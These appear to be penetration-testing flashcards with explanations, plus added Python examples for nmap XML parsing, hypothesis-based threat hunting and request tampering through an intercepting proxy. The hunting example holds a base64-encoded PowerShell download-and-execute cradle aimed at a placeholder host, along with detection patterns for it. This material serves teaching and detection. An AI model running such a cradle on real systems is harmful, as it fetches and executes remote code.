Vulnerability and Penetration Testing Flashcards
Which nmap command line parameter attempts to identify the operating system?
A. T
B. A
C. sU
D. O
D. O
The -O parameter tells nmap to attempt OS detection: it sends a series of crafted TCP, UDP and ICMP probes and compares the target's TCP/IP stack behaviour (initial TTL, window size, TCP option ordering, IP ID generation and similar details) against its fingerprint database. Two practical caveats: OS detection needs raw-socket access, so run it as root or Administrator, and it is most accurate when nmap finds at least one open and one closed TCP port on the target; otherwise the match is reported with low accuracy or not at all. Add -sV if you also want service versions.
Why the other options are incorrect:
A. T: This parameter is used to control the timing of the scan (e.g., -T4 for faster scans). It does not relate to OS detection.
B. A: The -A parameter enables several advanced features, such as OS detection, version detection, script scanning, and traceroute. While -A includes OS detection, -O is the specific option solely for operating system detection.
C. sU: This is used for a UDP scan (-sU), not for OS detection.
Which command allows you to interact with the Metasploit framework?
A. msfadmin
B. msfconsole
C. exploit
D. use
B. msfconsole
msfconsole is the command-line interface (CLI) used to interact with the Metasploit Framework. It provides an environment where you can configure and run exploits, payloads, auxiliary modules, and more, making it the primary tool for penetration testing with Metasploit.
Which term is commonly used to describe penetration testing?
A. Scheduled testing
B. Active testing
C. Recurring testing
D. Passive testing
B. Active testing
Penetration testing is active testing: the tester sends traffic to the target, probes its services and attempts to exploit vulnerabilities, simulating real-world attack scenarios. This contrasts with passive techniques such as traffic sniffing or open-source intelligence gathering, which observe without touching the target. Because active testing can affect the systems under test, it requires explicit authorization and an agreed scope before it starts.
Which term describes a collection of related Microsoft Azure policies?
A. Initiative
B. Resource Group
C. Policy group
D. Subscription
A. Initiative
In Azure Policy, an initiative (a policy set definition in the Resource Manager API) is a collection of related policy definitions grouped so they can be assigned and tracked as one unit. Assigning an initiative to a scope such as a management group, subscription or resource group applies every policy in the set in a single operation and reports compliance against the set as a whole, which is how built-in regulatory baselines are delivered.
Which data must be supplied when using the OWASP ZAP tool?
A. The web application URL
B. The web application PKI certificate public key
C. The web server type
D. The web application PKI certificate private key
A. The web application URL
OWASP ZAP (Zed Attack Proxy) needs the URL of the target web application so it can spider it and attack the pages it finds. It does not need the server's certificate keys: for HTTPS targets ZAP acts as the TLS endpoint itself, using its own root CA certificate (which you import into the browser when using ZAP as a proxy), and the web server type is something ZAP discovers during the scan rather than something you supply.
How do vulnerability scanning tools differ from network scanning tools?
A. Network scanners use a vulnerabilities database
B. Vulnerability scanners use a vulnerabilities database
C. Vulnerability scanners cannot enumerate host ports
D. Network scanners cannot enumerate host ports
B. Vulnerability scanners use a vulnerabilities database
Vulnerability scanners (Nessus, OpenVAS, Qualys and similar) assess whether a system is exposed to known weaknesses. They rely on a continually updated vulnerability database of checks keyed to CVEs and known misconfigurations, compare what they observe on the target (service versions, patch levels, settings) against it, and report the matches with severity and remediation detail.
Network scanners such as nmap discover hosts, open ports and running services. That inventory is the usual input to a vulnerability scan, but an open port by itself says nothing about whether the service behind it is vulnerable. Both kinds of tool can enumerate ports, which is why options C and D are wrong; the distinguishing feature is the vulnerability database.
You have installed Nessus and would like to login to configure a scan. Which should you connect to?
A. http://localhost:80
B. http://localhost:8834
C. http://localhost?443
D. http://localhost:443
B. http://localhost:8834
The Nessus web interface listens on TCP port 8834 by default. Note that it is served over TLS, so the URL you actually type is https://localhost:8834; a plain http request to that port will not work, and the self-signed certificate must be accepted (or replaced with your own) on first login. Nessus does not use ports 80 or 443.
In which file format does Zenmap save scans?
A. CSV
B. PDF
C. XML
D. TXT
C. XML
Zenmap, the graphical user interface (GUI) for nmap, saves scans in nmap's XML output format, the same format that nmap -oX produces on the command line. XML keeps the full structured result (hosts, port states, service versions, OS matches, script output), so a saved scan can be reloaded into Zenmap, compared against an earlier scan, or parsed by other tools for further analysis.
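The XML format above is what both Zenmap and nmap -oX write, and parsing it is the first step of the workflow from the earlier card on vulnerability scanners, where a network scanner's inventory of services is cross-referenced with a vulnerability database. The following Python is an added example, not code from these flashcards, Zenmap or nmap: the scan XML is a constructed sample in nmap's schema (the host 192.0.2.10, its two services and the osmatch lines are made up), and the vulnerability database is a hand-written toy of two entries whose CVE identifiers are real advisories but whose record layout is an assumption for this example.

```python
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Constructed sample in the nmap XML schema (what `nmap -sV -O -oX out.xml`
# or Zenmap's "Save Scan" writes), trimmed to the elements used below.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -O -oX out.xml 192.0.2.10">
  <host>
    <status state="up"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="8.2p1"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open"/>
        <service name="http" product="Apache httpd" version="2.4.49"/>
      </port>
      <port protocol="tcp" portid="443">
        <state state="closed"/>
      </port>
    </ports>
    <os>
      <osmatch name="Linux 4.15 - 5.6" accuracy="95"/>
      <osmatch name="Linux 3.2 - 4.9" accuracy="90"/>
    </os>
  </host>
</nmaprun>
"""

# Toy vulnerability database (an assumption for this example, not a real feed
# format). The identifiers are real CVEs; each entry covers the half-open
# version range [affected_from, fixed_in).
VULN_DB = [
    {"id": "CVE-2021-41773", "product": "Apache httpd",
     "affected_from": "2.4.49", "fixed_in": "2.4.50"},
    {"id": "CVE-2018-15473", "product": "OpenSSH",
     "affected_from": "0", "fixed_in": "7.8"},
]


@dataclass
class Service:
    host: str
    port: int
    proto: str
    name: str
    product: str
    version: str


def version_key(version):
    """Turn '2.4.49' or '8.2p1' into a tuple of ints for ordering (non-numeric
    suffixes such as 'p1' are ignored; good enough for banner comparison)."""
    key = []
    for piece in version.split("."):
        m = re.match(r"\d+", piece)
        key.append(int(m.group()) if m else 0)
    return tuple(key)


def parse_nmap_xml(xml_text):
    """Network-scanner view: open ports with their service banners, plus the
    -O fingerprint guesses, per host."""
    root = ET.fromstring(xml_text)
    services, os_guesses = [], {}
    for host in root.findall("host"):
        addr = host.find("address[@addrtype='ipv4']").get("addr")
        for port in host.findall("ports/port"):
            if port.find("state").get("state") != "open":
                continue
            svc = port.find("service")
            attrs = svc.attrib if svc is not None else {}
            services.append(Service(addr, int(port.get("portid")),
                                    port.get("protocol"), attrs.get("name", ""),
                                    attrs.get("product", ""), attrs.get("version", "")))
        os_guesses[addr] = [(m.get("name"), int(m.get("accuracy")))
                            for m in host.findall("os/osmatch")]
    return services, os_guesses


def match_vulnerabilities(services, db=VULN_DB):
    """Vulnerability-scanner view: cross-reference each banner with the DB.
    Banner matching is the cheap first pass; real scanners follow up with
    active probes and, when given credentials, package-level checks."""
    findings = []
    for s in services:
        if not s.version:
            continue  # no version in the banner: nothing to compare against
        v = version_key(s.version)
        for entry in db:
            if entry["product"] != s.product:
                continue
            if version_key(entry["affected_from"]) <= v < version_key(entry["fixed_in"]):
                findings.append((s.host, s.port, entry["id"]))
    return findings


if __name__ == "__main__":
    services, os_guesses = parse_nmap_xml(SAMPLE_XML)
    for s in services:
        print(f"{s.host}:{s.port}/{s.proto} {s.name} {s.product} {s.version}")
    for host, guesses in os_guesses.items():
        print(host, "OS guesses:", guesses)
    print("findings:", match_vulnerabilities(services))
```

Port 443 is dropped because its state is closed, OpenSSH 8.2p1 falls outside the second entry's range, and only Apache httpd 2.4.49 is reported. The same parser reads a real out.xml unchanged; the part a production scanner adds is a maintained database and checks that do more than compare banner strings.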
You need to run a vulnerability assessment against hosts that mimic an infected host. Which type of scan should you run?
A. Scheduled
B. Web application
C. Non-credentialed
D. Credentialed
D. Credentialed
A credentialed (authenticated) scan is given login credentials (SSH, SMB or WinRM, database accounts) so the scanner can log in to each target and inspect it from the inside: installed packages and patch levels, local configuration, registry settings and file permissions. That is the vantage point of malware already running on a host, so a credentialed scan is the closest approximation of what an infected host could see and reach. It also yields fewer false positives than a non-credentialed scan, which can only judge from what is exposed over the network. Use a dedicated, least-privilege, monitored account for it, since the scanner now holds those credentials.
Which type of SCADA component executes instructions on industrial devices?
A. DCS
B. PLC
C. CAN
D. ICS
B. PLC
A PLC (Programmable Logic Controller) is the ICS component that actually executes control logic on industrial equipment: it reads sensors, runs its program in a fixed scan cycle and drives actuators such as valves and motors in environments like manufacturing, automation and power generation. ICS is the umbrella term for these systems, a DCS (Distributed Control System) is an architecture that coordinates many controllers across a plant, and CAN (Controller Area Network) is a bus protocol used mainly in vehicles and machinery, not a component that runs instructions.
Which threat hunting model takes a proactive approach?
A. Intel-based
B. Hypothesis-based
C. Custom
D. Agile
B. Hypothesis-based
Hypothesis-based (structured) threat hunting is proactive: the hunter forms a hypothesis about how an adversary could be operating in the environment (for example, "a phished user's Office application would spawn PowerShell with an encoded command"), decides what evidence would confirm or refute it, and then queries the organization's telemetry for that evidence, typically framed as tactics, techniques and procedures (TTPs) rather than single indicators of compromise (IOCs). A hunt that finds nothing still has value, because it validates that the relevant telemetry exists and is searchable. Intel-based hunting, by contrast, starts from indicators received from outside and reacts to them.
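A hypothesis-based hunt in code form, as an added example that is not from these flashcards or from any particular hunting platform. The hypothesis, an assumption chosen for the demonstration, is that an adversary is launching PowerShell with base64-encoded command lines; the process-creation events are constructed JSON lines with made-up host names, users and a TEST-NET address, and the field names are an assumption rather than a specific SIEM's schema.

```python
import base64
import json
import re

# Hypothesis under test (an assumption chosen for this example): an adversary
# is running PowerShell with base64-encoded command lines to hide what it
# executes from keyword-based alerting (ATT&CK T1059.001 combined with T1027).


def encode_ps(command):
    """powershell.exe -EncodedCommand expects base64 of UTF-16LE text."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


# Constructed process-creation events (Windows 4688 / Sysmon event 1 style
# fields written as JSON lines). Hosts, users and 203.0.113.5 are made up;
# the field names are an assumption, not a particular SIEM's schema.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"host": "ws-017", "user": "jdoe", "parent": "explorer.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Date"},
    {"host": "ws-042", "user": "asmith", "parent": "WINWORD.EXE",
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -e " + encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')")},
    {"host": "srv-db1", "user": "svc_backup", "parent": "backup-agent.exe",
     "cmdline": "powershell.exe -EncodedCommand " + encode_ps(
         "Get-ChildItem D:\\backups | Measure-Object")},
    {"host": "ws-003", "user": "jdoe", "parent": "cmd.exe",
     "cmdline": "notepad.exe C:\\notes.txt"},
])

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -enc, ...), so matching the literal "-EncodedCommand" would miss most real
# usage. A base64 run of 16+ characters keeps "-ep bypass" from matching.
ENCODED_ARG = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-expression",
                  "iex ", "frombase64string")
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")


def decode_encoded_command(cmdline):
    """Return the decoded script if a PowerShell command line carries one."""
    m = ENCODED_ARG.search(cmdline)
    if not m or "powershell" not in cmdline.lower():
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt(events_jsonl):
    """Test the hypothesis against the data. Every hit comes back with the
    reasons it matched so an analyst can rank leads instead of alerting."""
    findings = []
    for line in events_jsonl.splitlines():
        ev = json.loads(line)
        decoded = decode_encoded_command(ev["cmdline"])
        if decoded is None:
            continue
        reasons = ["encoded PowerShell command line"]
        if any(marker in decoded.lower() for marker in CRADLE_MARKERS):
            reasons.append("download cradle in decoded payload")
        if ev["parent"].lower() in OFFICE_PARENTS:
            reasons.append("spawned by an Office application")
        findings.append({"host": ev["host"], "user": ev["user"],
                         "decoded": decoded, "reasons": reasons})
    # Most reasons first: the output is a ranked lead list, not an alert feed.
    findings.sort(key=lambda f: len(f["reasons"]), reverse=True)
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f["host"], f["user"], f["reasons"])
        print("   ", f["decoded"])
```

The ws-042 event matches on all three counts and ranks first; the backup job on srv-db1 is an encoded command too but decodes to routine administration, which is the kind of benign hit a hunter documents so the next iteration can exclude it. Note that 4688 events carry the command line only when the "Include command line in process creation events" audit policy is enabled (Sysmon event 1 includes it by default); if it is missing, the hunt's first finding is a telemetry gap, not a clean result.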
Which type of attack is in effect when malicious actors use the Burpsuite?
A. Man-in-the-middle
B. Distributed denial of service
C. Denial of service
D. Brute force
A. Man-in-the-middle
Burp Suite is an intercepting proxy (with an automated vulnerability scanner in the commercial edition) that sits between the browser and the web server, so in attack terms it is a man-in-the-middle: every request and response passes through it and can be inspected, held, modified or replayed before being forwarded, which is how testers alter parameters, headers and cookies to probe a web application. For HTTPS this works because Burp terminates TLS itself and re-signs each site with its own CA certificate, which the tester installs in the browser. A victim whose browser does not trust that CA would see certificate errors, which is why Burp is a testing tool used with a cooperating client rather than a covert interception platform.
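What the intercept-and-modify step looks like mechanically, as an added Python example that is neither Burp's code nor part of the original page: the raw request below is constructed (the host shop.example and the form fields are made up), and the function names are assumptions. It rewrites one form parameter and corrects the Content-Length header, the fix-up Burp performs automatically when you edit a request in the Proxy or Repeater.

```python
from urllib.parse import parse_qsl, urlencode

# Constructed request as a browser would send it through the proxy; the host
# and form fields are made up for the example.
SAMPLE_REQUEST = (
    b"POST /cart/update HTTP/1.1\r\n"
    b"Host: shop.example\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 20\r\n"
    b"\r\n"
    b"item=1234&quantity=2"
)


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (request line, [(name, value)], body).
    Header names keep their original case; lookups below are case-insensitive."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def build_request(request_line, headers, body):
    """Serialize the parsed pieces back into the bytes sent to the server."""
    head = "\r\n".join([request_line] + [f"{n}: {v}" for n, v in headers])
    return head.encode("latin-1") + b"\r\n\r\n" + body


def rewrite_form_field(raw, field, new_value):
    """Change one urlencoded form field and fix Content-Length to match."""
    request_line, headers, body = parse_request(raw)
    params = parse_qsl(body.decode("latin-1"), keep_blank_values=True)
    params = [(k, new_value if k == field else v) for k, v in params]
    new_body = urlencode(params).encode("latin-1")
    # A stale Content-Length makes the server truncate the body or wait for
    # bytes that never arrive, so every edit must recompute it.
    headers = [(n, str(len(new_body)) if n.lower() == "content-length" else v)
               for n, v in headers]
    return build_request(request_line, headers, new_body)


if __name__ == "__main__":
    print(rewrite_form_field(SAMPLE_REQUEST, "quantity", "10").decode("latin-1"))
```

The server only ever sees the rewritten bytes; nothing in the browser's own validation of the quantity field survives the trip through the proxy, which is the general lesson of testing with an intercepting proxy: client-side checks are not security controls.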